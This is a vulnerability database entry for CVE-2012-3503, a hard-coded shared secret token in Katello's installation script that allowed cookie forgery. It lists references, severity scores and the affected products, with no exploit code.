CVE-2012-3503
CRITICALKatello < 1.0 - Use of Hard-coded Credentials in Installation Script
Title source: llmDescription
The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.
References (6)
Core 6
Core References
Broken Link third-party-advisory
x_refsource_secunia
http://secunia.com/advisories/50344
Third Party Advisory vendor-advisory
x_refsource_redhat
http://rhn.redhat.com/errata/RHSA-2012-1187.html
Broken Link, Third Party Advisory, VDB Entry vdb-entry
x_refsource_bid
http://www.securityfocus.com/bid/55140
Issue Tracking x_refsource_confirm
https://github.com/Katello/katello/pull/499
Patch x_refsource_confirm
https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3
Broken Link, Third Party Advisory vendor-advisory
x_refsource_redhat
http://rhn.redhat.com/errata/RHSA-2012-1186.html
Scores
CVSS v3
9.8
EPSS
0.0130
EPSS Percentile
80.0%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details
CWE
CWE-798
Status
published
Products (3)
redhat/enterprise_linux_server
6.0
rubygems/katello
0 - 1.0.6RubyGems
theforeman/katello
< 1.0
Published
Aug 25, 2012
Tracked Since
Feb 18, 2026